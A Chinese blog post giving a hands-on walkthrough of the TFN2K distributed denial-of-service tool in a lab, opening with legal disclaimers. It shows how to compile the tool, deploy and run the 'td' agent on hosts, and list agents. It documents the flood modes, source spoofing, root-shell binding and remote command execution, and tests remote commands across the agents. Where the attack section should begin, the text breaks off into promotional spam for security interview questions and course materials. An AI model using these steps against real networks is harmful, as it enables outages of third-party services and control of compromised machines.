软件TFN 2K的分布式拒绝攻击(DDos)实战详解_ddostfn攻击

---

本人写这篇博客的目的，并不是我想成为黑客或者鼓励大家做损坏任何人安全和利益的事情。因科研需要，我学习软件TFN 2K的分布式拒绝攻击，只是分享自己的学习过程和经历，有助于大家更好的关注到网络安全及网络维护上。

需要强调的是，进行未经授权的网络攻击是非法的，违反了法律法规，可能导致刑事起诉和重大法律后果。

一定要尊重法律和道德，不要参与或支持任何网络攻击行为。如果你是网络管理员，应该采取适当的安全措施来保护你的网络免受DDoS攻击的影响。

这篇文章仅供技术参考，千万不要用其做一些违法操作！如果你利用它来做一些不合法的事情，那结果与我无关。

一. TFN 2K概述

---

什么是DDos

DDoS攻击（Distributed Denial of Service Attack），即分布式拒绝服务攻击。最简单的定义就是：多台电脑对一台电脑的攻击，占用目标服务器或网络资源的攻击行为

什么是TFN 2K

TFN 2K通过主控端利用大量代理端主机的资源进行对一个或多个目标进行协同攻击，是DDos的实现工具

攻击体系

主控端—运行TFN客户端，来遥控并指定攻击目标，更改攻击方法

代理端—被植入并运行TD进程的牺牲品，接受TFN的指挥，攻击的实施者

TFN 2K特性

• 主控端通过随机TCP、UDP、ICMP之一的数据包向代理端主机发送命令，攻击方法包括TCP/SYN、UDP、ICMP/PING、混合攻击、TARGA3等。
• 主控端与代理端的通讯采取单向，即主控端只向代理端发送命令，并且会采取随机的头信息，甚至虚拟的源地址信息，代理端不会逆向向主控端发送任何信息。

二. 安装配置

---

我在个人本地服务器上部署了几台设备，来模拟应用场景。网络拓扑如下，需实现Master控制两台Attacker攻击两台Defender

2.1 安装TFN

---

在主控端Master下载TFN 2K软件（因软件的特殊性，本人概不提供相关的下载渠道），设下载并解压的文件夹名称为TFN2K。

切换至下载目录，对软件进行编译，同时设置一个八位数的登录密码

cd TFN2K/src
make

编译后即可生成tfn和td

登录所有代理端，将主机端的td下载到代理端本地

scp root@192.166.60.1:/root/TFN2K/src/td ./
scp root@192.166.61.1:/root/TFN2K/src/td ./

为td赋权，并执行文件，此时，代理端部署完毕

chmod 777 td
./td

可利用ps -a查看进程，发现td已经在运行了

2.2 TFN命令讲解

---

可在主控端输入./tfn查看相关参数

• -P protocol：设置服务器通信的协议。可以是ICMP、UDP或TCP。使用随机协议作为默认值
• -D n：为每个真实的请求发送n个虚假请求以诱骗目标
• -S hostIp：可指定源ip。默认情况下随机欺骗
• -f hostlist：存储TFN的所有主控端的文件名，表示其中所有主控端均实现攻击操作
• -h hostname：只利用该主控端发起攻击，也就是一对一的攻击，后面跟一个主机或IP地址
• -p port：为SYN洪泛指定TCP目标端口
• -c ID：攻击参数
  • -c 0 ：停止攻击
  • -c 1：设置反欺骗等级设定，用法：-i 0（完全欺骗）到-i 3（/24个主机字节欺骗）
  • -c 2：改变攻击数据包大小，用法：-i <packet size in bytes>
  • -c 3：将根shell绑定到一个指定的端口，用法：-i＜remote port＞
  • -c 4：UDP洪水，用法：-i victim@victim2@victim3@...
  • -c 5：TCP/SYN洪水，用法：-i victim@...[-p目标端口]
  • -c 6：ICMP/PING洪水，用法：-i victim@...
  • -c 7：ICMP/SMURF洪水，用法：-i victim@broadcast@broadcast2@...
  • -c 8：MIX flood（随机UDP/TCP/ICMP攻击），用法：-i victim@...
  • -c 9：TARGA3洪水（IP堆栈渗透），用法：-i victim@...
  • -c 10：盲目执行远程shell命令，使用-i命令，一般还可用于远程命令控制

2.3 测试TD

---

在实现泛洪攻击前，先对所有的代理端进行测试，测试其是否可“听从”主控端的安排

创建host.txt文件用于记录所有运行了./td文件的代理端

echo "192.166.60.2" > host.txt
echo "192.166.61.2" > host.txt

操作tfn向所有的代理端实现创建文件夹的命令，一般创建的文件夹都和td在同一级目录

./tfn -f /root/TFN2K/host.txt -c 10 -i "mkdir TestMakeDir"

查看代理端可知，文件夹创建成功，表明主控端可操作所有的代理端

三. 攻击

还有兄弟不知道网络安全面试可以提前刷题吗？费时一周整理的160+网络安全面试题，金九银十，做网络安全面试里的显眼包！

王岚嵚工程师面试题（附答案），只能帮兄弟们到这儿了！如果你能答对70%，找一个安全工作，问题不大。

对于有1-3年工作经验，想要跳槽的朋友来说，也是很好的温习资料！

【完整版领取方式在文末！！】

93道网络安全面试题

内容实在太多，不一一截图了

黑客学习资源推荐

最后给大家分享一份全套的网络安全学习资料，给那些想学习 网络安全的小伙伴们一点帮助！

对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

😝朋友们如果有需要的话，可以联系领取~

1️⃣零基础入门

① 学习路线

对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

② 路线对应学习视频

同时每个成长路线对应的板块都有配套的视频提供：

2️⃣视频配套工具&国内外网安书籍、文档

① 工具

② 视频

③ 书籍

资源较为敏感，未展示全面，需要的最下面获取

② 简历模板

因篇幅有限，资料较为敏感仅展示部分资料，添加上方即可获取👆

网上学习资料一大堆，但如果学到的知识不成体系，遇到问题时只是浅尝辄止，不再深入研究，那么很难做到真正的技术提升。

需要这份系统化资料的朋友，可以点击这里获取

一个人可以走的很快，但一群人才能走的更远！不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！